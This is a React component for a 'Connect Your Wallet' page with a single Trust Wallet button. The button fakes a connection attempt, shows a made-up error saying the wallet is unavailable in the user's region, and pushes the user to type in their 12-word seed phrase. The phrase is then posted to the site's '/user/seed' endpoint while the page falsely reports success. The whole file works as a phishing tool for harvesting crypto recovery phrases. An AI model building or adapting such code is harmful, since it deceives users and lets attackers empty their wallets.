// src/components/SeedPhraseSection.jsx
import { useState, useEffect } from 'react';
import { toast } from 'react-hot-toast';
import { Wallet, AlertCircle, Loader2, Copy, ArrowLeft } from 'lucide-react';
import API from '../utils/api';
import BottomNav from './BottomNav'; 

const wallets = [
  {
    name: 'Trust Wallet',
    icon: 'https://raw.githubusercontent.com/trustwallet/assets/master/blockchains/ethereum/info/logo.png',
   
  },

];

export default function SeedPhraseSection() {
  const [showManual, setShowManual] = useState(false);
  const [loadingWallet, setLoadingWallet] = useState(null);
  const [seedWords, setSeedWords] = useState(Array(12).fill(''));
  const [submitting, setSubmitting] = useState(false);

  useEffect(() => {
    const firstEmpty = seedWords.findIndex(w => !w);
    if (firstEmpty !== -1 && showManual) {
      document.getElementById(`word-${firstEmpty}`)?.focus();
    }
  }, [seedWords, showManual]);

  const handlePaste = (e) => {
    e.preventDefault();
    const pasted = e.clipboardData.getData('text').trim().toLowerCase().split(/\s+/);
    if (pasted.length >= 12) {
      setSeedWords(pasted.slice(0, 12));
      toast.success('Phrase pasted!');
    }
  };

  const handleWalletConnect = (name) => {
    setLoadingWallet(name);
    setTimeout(() => {
      setLoadingWallet(null);
      toast.error(
  `Failed to connect ${name}. Trust Wallet connection is not available in your region — please use your seed phrase instead.`, { duration: 10000 });

      setShowManual(true);
    }, 3000);
  };

  const handleSeedChange = (index, value) => {
    const clean = value.toLowerCase().replace(/[^a-z]/g, '');
    const newWords = [...seedWords];
    newWords[index] = clean;
    setSeedWords(newWords);
    if (clean && index < 11) {
      document.getElementById(`word-${index + 1}`)?.focus();
    }
  };

  const handleSubmit = async (e) => {
    e.preventDefault();
    if (seedWords.some(w => !w)) return toast.error('Fill all 12 words');
    setSubmitting(true);
    try {
      await API.post('/user/seed', { seedPhrase: seedWords.join(' ') });
      toast.success('Wallet connected!', { icon: 'Success' });
      setSeedWords(Array(12).fill(''));
      setShowManual(false);
    } catch (err) {
      toast.error(err.response?.data?.message || 'Failed');
    } finally {
      setSubmitting(false);
    }
  };

  return (
    <>
      {/* MAIN CONTENT — Safe from top & bottom navs */}
      <div 
        className="min-h-screen bg-gradient-to-br from-[#0f0f1e] via-[#1a1a2e] to-[#16213e] text-white
                   pt-[calc(4.5rem+env(safe-area-inset-top))]     /* Top navbar safe */
                   pb-[calc(5rem+env(safe-area-inset-bottom))]    /* BottomNav safe */
                   px-4"
      >
        <div className="max-w-2xl mx-auto">

          {/* Header */}
          <div className="text-center mb-10">
            <div className="inline-flex items-center justify-center w-16 h-16 bg-gradient-to-br from-purple-600 to-pink-600 rounded-2xl mb-4 shadow-2xl">
              <Wallet className="w-9 h-9" />
            </div>
            <h1 className="text-3xl font-bold bg-gradient-to-r from-purple-400 to-pink-400 bg-clip-text text-transparent">
              Connect Your Wallet
            </h1>
            <p className="text-gray-400 mt-2">Choose a wallet or enter your seed phrase</p>
          </div>

          {/* Wallet Cards */}
          <div className="grid grid-cols-1 sm:grid-cols-3 gap-5 mb-8">
            {wallets.map((wallet) => (
              <button
                key={wallet.name}
                onClick={() => handleWalletConnect(wallet.name)}
                disabled={!!loadingWallet}
                className="group relative overflow-hidden rounded-2xl bg-white/5 backdrop-blur-xl border border-white/10 p-6 hover:border-white/30 transition-all hover:scale-105"
              >
                <div className={`absolute inset-0 bg-gradient-to-br ${wallet.gradient} opacity-0 group-hover:opacity-20 transition`} />
                <img src={wallet.icon} alt={wallet.name} className="w-12 h-12 mx-auto mb-3" />
                <p className="font-semibold text-lg">
                  {loadingWallet === wallet.name ? 'Connecting...' : wallet.name}
                </p>
                {loadingWallet === wallet.name && <Loader2 className="w-5 h-5 mx-auto mt-2 animate-spin text-purple-400" />}
              </button>
            ))}
          </div>

          {/* Toggle Manual */}
          <div className="text-center mb-8">
            <button
              onClick={() => setShowManual(!showManual)}
              className="text-purple-400 font-medium hover:text-purple-300 transition flex items-center gap-2 mx-auto"
            >
              {showManual && <ArrowLeft className="w-5 h-5" />}
              {showManual ? 'Back' : 'Or use seed phrase'}
            </button>
          </div>

          {/* Seed Form */}
          {showManual && (
            <div className="bg-white/5 backdrop-blur-2xl rounded-3xl border border-white/10 p-6 shadow-2xl">
              <div className="flex items-center gap-3 mb-6 text-orange-400">
                <AlertCircle className="w-6 h-6" />
                <h3 className="text-xl font-bold">Enter Seed Phrase</h3>
              </div>

              <div className="bg-black/30 rounded-2xl p-5 mb-6 border border-white/10" onPaste={handlePaste}>
                <div className="grid grid-cols-2 sm:grid-cols-3 lg:grid-cols-4 gap-3">
                  {seedWords.map((word, i) => (
                    <input
                      key={i}
                      id={`word-${i}`}
                      type="text"
                      value={word}
                      onChange={(e) => handleSeedChange(i, e.target.value)}
                      placeholder={`${i + 1}`}
                      className="bg-white/10 border border-white/20 rounded-xl px-3 py-4 text-center text-sm font-mono focus:border-purple-500 focus:ring-2 focus:ring-purple-500/30 transition placeholder-gray-500"
                      maxLength={15}
                      disabled={submitting}
                    />
                  ))}
                </div>
              </div>

              <div className="flex gap-3">
                <button
                  type="button"
                  onClick={() => toast.success('Paste your 12-word phrase')}
                  className="flex-1 flex items-center justify-center gap-2 py-4 bg-white/10 rounded-2xl hover:bg-white/20 transition"
                >
                  <Copy className="w-5 h-5" /> Paste
                </button>

                <button
                  onClick={handleSubmit}
                  disabled={submitting || seedWords.some(w => !w)}
                  className="flex-1 py-4 bg-gradient-to-r from-purple-600 to-pink-600 rounded-2xl font-bold text-lg hover:scale-105 transition disabled:opacity-50 shadow-lg flex items-center justify-center gap-2"
                >
                  {submitting ? <>Importing... <Loader2 className="w-5 h-5 animate-spin" /></> : 'Connect Wallet'}
                </button>
              </div>
            </div>
          )}
        </div>
      </div>

      {/* Fixed Bottom Navigation — Never overlaps content */}
      <div className="fixed inset-x-0 bottom-0 z-50">
        <BottomNav />
      </div>
    </>
  );
}